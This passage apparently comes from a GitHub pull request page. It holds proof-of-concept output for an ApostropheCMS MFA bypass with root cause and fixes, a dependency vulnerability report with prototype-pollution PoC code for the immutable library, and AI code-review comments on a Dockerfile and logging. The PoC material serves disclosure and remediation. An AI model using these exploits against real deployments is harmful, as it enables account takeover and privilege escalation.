console.log(`    Response: {"incompleteToken": "clxxxxxxxxxxxxxxxxxxxxxxxxx"}`);
console.log(`    (TOTP verification still required)\n`);

console.log(`  ${YELLOW}Step 3:${RESET} Attacker uses incompleteToken as a Bearer token`);
console.log(`    GET /api/v1/@apostrophecms/page`);
console.log(`    Authorization: Bearer clxxxxxxxxxxxxxxxxxxxxxxxxx\n`);

console.log(`  ${YELLOW}Step 4:${RESET} Bearer token middleware runs getBearer() query`);
console.log(`    MongoDB query: {`);
console.log(`      _id: "clxxxxxxxxxxxxxxxxxxxxxxxxx",`);
console.log(`      expires: { $gte: new Date() },`);
console.log(`      $or: [`);
console.log(`        { requirementsToVerify: { $exists: false } },`);
console.log(`        { requirementsToVerify: { ${RED}$ne: []${RESET} } }  // BUG!`);
console.log(`      ]`);
console.log(`    }`);
console.log(`    The token has requirementsToVerify: ["AposTotp"]`);
console.log(`    $ne: [] matches because ["AposTotp"] !== []\n`);

console.log(`  ${RED}Step 5: Attacker is fully authenticated as the victim!${RESET}`);
console.log(`    req.user is set, req.csrfExempt = true`);
console.log(`    Full API access without TOTP verification\n`);

// Summary
console.log(`${BOLD}${'='.repeat(64)}`);
console.log(`Summary`);
console.log(`${'='.repeat(64)}${RESET}`);
console.log(`  ${bypasses.length} bypass vector(s) confirmed: ${bypasses.join(', ')}\n`);
console.log(`  ${YELLOW}Root Cause:${RESET} @apostrophecms/express/index.js line 388`);
console.log(`  The MongoDB query uses $ne: [] which matches NON-empty arrays.`);
console.log(`  The comment says the array should be "empty or inexistant",`);
console.log(`  but $ne: [] matches exactly the opposite — non-empty arrays.\n`);
console.log(`  ${YELLOW}Vulnerable code:${RESET}`);
console.log(`    $or: [`);
console.log(`      { requirementsToVerify: { $exists: false } },`);
console.log(`      { requirementsToVerify: { $ne: [] } }  // BUG`);
console.log(`    ]\n`);
console.log(`  ${YELLOW}Fixed code:${RESET}`);
console.log(`    $or: [`);
console.log(`      { requirementsToVerify: { $exists: false } },`);
console.log(`      { requirementsToVerify: { $size: 0 } }  // FIX`);
console.log(`    ]\n`);
console.log(`  ${RED}Impact:${RESET} Complete MFA bypass. An attacker who knows a user's`);
console.log(`  password can skip TOTP verification and gain full authenticated`);
console.log(`  API access by using the incompleteToken as a bearer token.\n`);
console.log(`  ${YELLOW}Additional Bug:${RESET} The same $ne:[] also causes a secondary`);
console.log(`  issue where tokens with ALL requirements verified (empty array,`);
console.log(`  before the $unset runs) are incorrectly REJECTED. This is masked`);
console.log(`  by the fact that finalizeIncompleteLogin uses $unset to remove`);
console.log(`  the field entirely, so the $exists: false path is used instead.`);
console.log();
console.log();

Both bypass vectors (single and multiple unverified requirements) confirmed.

Amplifying Bug: Incorrect Token Deletion in finalizeIncompleteLogin

A second bug in @apostrophecms/login/index.js (lines 728-729, 735-736) amplifies the MFA bypass. When finalizeIncompleteLogin attempts to delete the incomplete token, it uses the wrong identifier:

await self.bearerTokens.removeOne({
    _id: token.userId  // BUG: should be token._id
});

The token's _id is a CUID (e.g., clxxxxxxxxx), but token.userId is the user's document ID. This means:

  1. The incomplete token is never deleted from the database, even after a legitimate MFA-verified login
  2. Combined with the $ne: [] bug, the incomplete token remains usable as a bearer token for its full lifetime (default: 1 hour)
  3. Even if the legitimate user completes TOTP and logs in properly, the incomplete token persists

This bug appears at two locations in finalizeIncompleteLogin:

  • Line 728-729: Error case (user not found)
  • Line 735-736: Success case (session-based login after MFA)

Recommended Fix

Fix 1: Bearer token query (express/index.js line 388)

Replace $ne: [] with $size: 0:

$or: [
    { requirementsToVerify: { $exists: false } },
    { requirementsToVerify: { $size: 0 } }  // FIX: match empty array only
]

This ensures only tokens with no remaining requirements (empty array or absent field) are accepted as valid bearer tokens.

Fix 2: Token deletion (login/index.js lines 728-729, 735-736)

Replace token.userId with token._id:

await self.bearerTokens.removeOne({
    _id: token._id  // FIX: use the token's actual ID
});
critical: 0 high: 1 medium: 0 low: 0 jws 4.0.0 (npm)

pkg:npm/jws@4.0.0

high 7.5: CVE--2025--65945 Improper Verification of Cryptographic Signature

Affected range=4.0.0
Fixed version4.0.1
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS Score0.010%
EPSS Percentile1st percentile
Description

Overview

An improper signature verification vulnerability exists when using auth0/node-jws with the HS256 algorithm under specific conditions.

Am I Affected?

You are affected by this vulnerability if you meet all of the following preconditions:

  1. Application uses the auth0/node-jws implementation of JSON Web Signatures, versions <=3.2.2 || 4.0.0
  2. Application uses the jws.createVerify() function for HMAC algorithms
  3. Application uses user-provided data from the JSON Web Signature Protected Header or Payload in the HMAC secret lookup routines

You are NOT affected by this vulnerability if you meet any of the following preconditions:

  1. Application uses the jws.verify() interface (note: auth0/node-jsonwebtoken users fall into this category and are therefore NOT affected by this vulnerability)
  2. Application uses only asymmetric algorithms (e.g. RS256)
  3. Application doesn’t use user-provided data from the JSON Web Signature Protected Header or Payload in the HMAC secret lookup routines

Fix

Upgrade auth0/node-jws version to version 3.2.3 or 4.0.1

Acknowledgement

Okta would like to thank Félix Charette for discovering this vulnerability.

critical: 0 high: 1 medium: 0 low: 0 async 1.5.2 (npm)

pkg:npm/async@1.5.2

high 7.8: CVE--2021--43138 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range<2.6.4
Fixed version2.6.4, 3.2.2
CVSS Score7.8
CVSS VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score0.657%
EPSS Percentile71st percentile
Description

A vulnerability exists in Async through 3.2.1 (fixed in 3.2.2), which could let a malicious user obtain privileges via the mapValues() method.

critical: 0 high: 1 medium: 0 low: 0 immutable 5.1.1 (npm)

pkg:npm/immutable@5.1.1

high 8.7: CVE--2026--29063 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Affected range>=5.0.0
<5.1.5
Fixed version5.1.5
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
EPSS Score0.060%
EPSS Percentile18th percentile
Description

Impact

What kind of vulnerability is it? Who is impacted?

A Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.

Affected APIs

API Notes
mergeDeep(target, source) Iterates source keys via ObjectSeq, assigns merged[key]
mergeDeepWith(merger, target, source) Same code path
merge(target, source) Shallow variant, same assignment logic
Map.toJS() object[k] = v in toObject() with no __proto__ guard
Map.toObject() Same toObject() implementation
Map.mergeDeep(source) When source is converted to plain object

Patches

Has the problem been patched? What versions should users upgrade to?

major version patched version
3.x 3.8.3
4.x 4.3.7
5.x 5.1.5

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

Proof of Concept

PoC 1 — mergeDeep privilege escalation

"use strict";
const { mergeDeep } = require("immutable"); // v5.1.4

// Simulates: app merges HTTP request body (JSON) into user profile
const userProfile = { id: 1, name: "Alice", role: "user" };
const requestBody = JSON.parse(
  '{"name":"Eve","__proto__":{"role":"admin","admin":true}}',
);

const merged = mergeDeep(userProfile, requestBody);

console.log("merged.name:", merged.name); // Eve   (updated correctly)
console.log("merged.role:", merged.role); // user  (own property wins)
console.log("merged.admin:", merged.admin); // true  ← INJECTED via __proto__!

// Common security checks — both bypassed:
const isAdminByFlag = (u) => u.admin === true;
const isAdminByRole = (u) => u.role === "admin";
console.log("isAdminByFlag:", isAdminByFlag(merged)); // true  ← BYPASSED!
console.log("isAdminByRole:", isAdminByRole(merged)); // false (own role=user wins)

// Stealthy: Object.keys() hides 'admin'
console.log("Object.keys:", Object.keys(merged)); // ['id', 'name', 'role']
// But property lookup reveals it:
console.log("merged.admin:", merged.admin); // true

PoC 2 — All affected APIs

"use strict";
const { mergeDeep, mergeDeepWith, merge, Map } = require("immutable");

const payload = JSON.parse('{"__proto__":{"admin":true,"role":"superadmin"}}');

// 1. mergeDeep
const r1 = mergeDeep({ user: "alice" }, payload);
console.log("mergeDeep admin:", r1.admin); // true

// 2. mergeDeepWith
const r2 = mergeDeepWith((a, b) => b, { user: "alice" }, payload);
console.log("mergeDeepWith admin:", r2.admin); // true

// 3. merge
const r3 = merge({ user: "alice" }, payload);
console.log("merge admin:", r3.admin); // true

// 4. Map.toJS() with __proto__ key
const m = Map({ user: "alice" }).set("__proto__", { admin: true });
const r4 = m.toJS();
console.log("toJS admin:", r4.admin); // true

// 5. Map.toObject() with __proto__ key
const m2 = Map({ user: "alice" }).set("__proto__", { admin: true });
const r5 = m2.toObject();
console.log("toObject admin:", r5.admin); // true

// 6. Nested path
const nested = JSON.parse('{"profile":{"__proto__":{"admin":true}}}');
const r6 = mergeDeep({ profile: { bio: "Hello" } }, nested);
console.log("nested admin:", r6.profile.admin); // true

// 7. Confirm NOT global
console.log("({}).admin:", {}.admin); // undefined (global safe)

Verified output against immutable@5.1.4:

mergeDeep admin: true
mergeDeepWith admin: true
merge admin: true
toJS admin: true
toObject admin: true
nested admin: true
({}).admin: undefined  ← global Object.prototype NOT polluted

References

Are there any links users can visit to find out more?

Copy link
Contributor

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 2

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
Dockerfile (1)

1-37: 🧹 Nitpick | 🔵 Trivial

Add HEALTHCHECK instruction for container orchestration.

Both Trivy and Checkov flag the missing HEALTHCHECK. Without it, orchestrators (Kubernetes, Docker Swarm, ECS) cannot determine if the application inside the container is actually healthy and serving requests.

🩺 Suggested HEALTHCHECK
 # Switch to non-root user
 USER appuser

 # Set working directory
 WORKDIR /app

+# Health check for container orchestration
+HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \
+  CMD node -e "require('http').get('http://localhost:3000/health', (r) => process.exit(r.statusCode === 200 ? 0 : 1)).on('error', () => process.exit(1))"
+
 # Expose the port the app runs on
 EXPOSE 3000

This requires a /health endpoint in your Express app. Alternatively, use wget or curl if available in the Alpine image.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@Dockerfile` around lines 1 - 37, Add a Docker HEALTHCHECK instruction to the
Dockerfile so orchestrators can probe the app; add a HEALTHCHECK that
periodically curl/wget http://localhost:3000/health (or your Express /health
route) and returns non-zero on failure, placed after EXPOSE 3000 and before CMD
["npm","start"]. Ensure your app exposes a /health handler in the Express server
(e.g., in the code that starts under npm start) that returns 200 when healthy;
if curl/wget are not present in the base image, either install a tiny probe
utility during the build stage or switch the healthcheck command to use a
shell-built-in check appropriate for node.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@Dockerfile`:
- Line 24: Typo in the Dockerfile comment: change the word "wfrom" to "from" in
the comment line that reads "Copy layer wfrom build image" so it becomes "Copy
layer from build image"; locate this in the Dockerfile comment and correct the
spelling.

In `@website/modules/`@apostrophecms/express/index.js:
- Around line 11-19: The request-logging middleware (middleware -> logRequests
-> middleware) uses morgan unconditionally; make it environment-aware by
checking NODE_ENV or an equivalent runtime config and only registering or using
the verbose morgan format in non-production (or when a config flag like
ENABLE_REQUEST_LOGGING is true). Modify the middleware factory to read
process.env.NODE_ENV (or the module's options) and conditionally return the
logRequests entry (or swap to a compact/obfuscated format) so production avoids
the current verbose morgan(':date[iso] :method :url :status :response-time ms -
:remote-addr - :user-agent') while dev/test keep it.

---

Outside diff comments:
In `@Dockerfile`:
- Around line 1-37: Add a Docker HEALTHCHECK instruction to the Dockerfile so
orchestrators can probe the app; add a HEALTHCHECK that periodically curl/wget
http://localhost:3000/health (or your Express /health route) and returns
non-zero on failure, placed after EXPOSE 3000 and before CMD ["npm","start"].
Ensure your app exposes a /health handler in the Express server (e.g., in the
code that starts under npm start) that returns 200 when healthy; if curl/wget
are not present in the base image, either install a tiny probe utility during
the build stage or switch the healthcheck command to use a shell-built-in check
appropriate for node.

ℹ️ Review info
⚙️ Run configuration

Configuration used: Organization UI

Review profile: ASSERTIVE

Plan: Pro

Run ID: 19897063-72dc-4ae7-9a88-73ee937b44c9

📥 Commits

Reviewing files that changed from the base of the PR and between 4389063 and 40c32c7.

⛔ Files ignored due to path filters (1)
  • website/package-lock.json is excluded by !**/package-lock.json
📒 Files selected for processing (3)
  • Dockerfile
  • website/modules/@apostrophecms/express/index.js
  • website/package.json

# Create a non-root user and group
RUN addgroup -S appgroup && adduser -S -G appgroup appuser

# Copy layer wfrom build image
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟡 Minor

Typo in comment.

wfromfrom

-# Copy layer wfrom build image
+# Copy layer from build image
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
# Copy layer wfrom build image
# Copy layer from build image
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@Dockerfile` at line 24, Typo in the Dockerfile comment: change the word
"wfrom" to "from" in the comment line that reads "Copy layer wfrom build image"
so it becomes "Copy layer from build image"; locate this in the Dockerfile
comment and correct the spelling.

Comment on lines +11 to +19
middleware(_self) {
return {
logRequests: {
middleware: morgan(
':date[iso] :method :url :status :response-time ms - :remote-addr - :user-agent',
),
},
};
},
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🧹 Nitpick | 🔵 Trivial

Consider making request logging environment-aware.

The morgan middleware is unconditionally enabled for all environments. In production, verbose request logging can:

  • Generate significant log volume
  • Potentially impact performance on high-traffic endpoints
  • Log sensitive URL parameters

Consider gating logging or adjusting the format based on environment:

♻️ Suggested approach
+const { getEnv } = require('../../../utils/env');
+
 module.exports = {
   options: {
     session: {
       secret: getEnv('SESSION_SECRET'),
     },
   },
   middleware(_self) {
+    const nodeEnv = getEnv('NODE_ENV') || 'development';
+    const format = nodeEnv === 'production'
+      ? 'combined'
+      : ':date[iso] :method :url :status :response-time ms - :remote-addr - :user-agent';
     return {
       logRequests: {
-        middleware: morgan(
-          ':date[iso] :method :url :status :response-time ms - :remote-addr - :user-agent',
-        ),
+        middleware: morgan(format),
       },
     };
   },
 };
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@website/modules/`@apostrophecms/express/index.js around lines 11 - 19, The
request-logging middleware (middleware -> logRequests -> middleware) uses morgan
unconditionally; make it environment-aware by checking NODE_ENV or an equivalent
runtime config and only registering or using the verbose morgan format in
non-production (or when a config flag like ENABLE_REQUEST_LOGGING is true).
Modify the middleware factory to read process.env.NODE_ENV (or the module's
options) and conditionally return the logRequests entry (or swap to a
compact/obfuscated format) so production avoids the current verbose
morgan(':date[iso] :method :url :status :response-time ms - :remote-addr -
:user-agent') while dev/test keep it.

@a-nomad a-nomad merged commit 8b02654 into main Mar 19, 2026
11 checks passed
@a-nomad a-nomad deleted the devops/change-image branch March 19, 2026 14:23
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant